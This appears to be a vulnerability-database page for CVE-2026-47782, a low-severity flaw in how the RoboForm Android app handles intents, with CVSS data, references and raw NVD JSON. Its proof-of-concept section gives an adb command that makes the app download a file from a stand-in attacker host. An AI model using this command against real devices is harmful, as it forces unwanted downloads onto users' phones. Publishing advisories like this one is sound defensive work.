CVE-2026-47782

Description

Android App "RoboForm Password Manager" provided by Siber Systems, Inc. handles Android intents without sufficient URL validation, user confirmation nor notification. If a URL to some malicious web page is given through an intent, RoboForm may silently download files without user confirmation nor notification.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

RoboForm Password Manager for Android (具体受影响版本未在提供信息中明确列出，建议更新至最新版)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC to exploit RoboForm Intent handling
# This command sends a malicious intent to trigger a silent download
# Usage: adb shell <command>

adb shell am start -n com.siber.roboform/.MainActivity -eu url "http://attacker.example.com/malicious_file.bin"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-47782
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-47782
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-47782/
[4] VulDB https://vuldb.com/cve/CVE-2026-47782
[5] https://jvn.jp/en/vu/JVNVU93461473/
[6] https://play.google.com/store/apps/details?id=com.siber.roboform
[7] https://www.roboform.com/news-android

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-47782", "sourceIdentifier": "[email protected]", "published": "2026-05-20T23:16:35.773", "lastModified": "2026-05-21T16:08:18.383", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Android App \"RoboForm Password Manager\" provided by Siber Systems, Inc. handles Android intents without sufficient URL validation, user confirmation nor notification. If a URL to some malicious web page is given through an intent, RoboForm may silently download files without user confirmation nor notification."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-357"}]}], "references": [{"url": "https://jvn.jp/en/vu/JVNVU93461473/", "source": "[email protected]"}, {"url": "https://play.google.com/store/apps/details?id=com.siber.roboform", "source": "[email protected]"}, {"url": "https://www.roboform.com/news-android", "source": "[email protected]"}]}}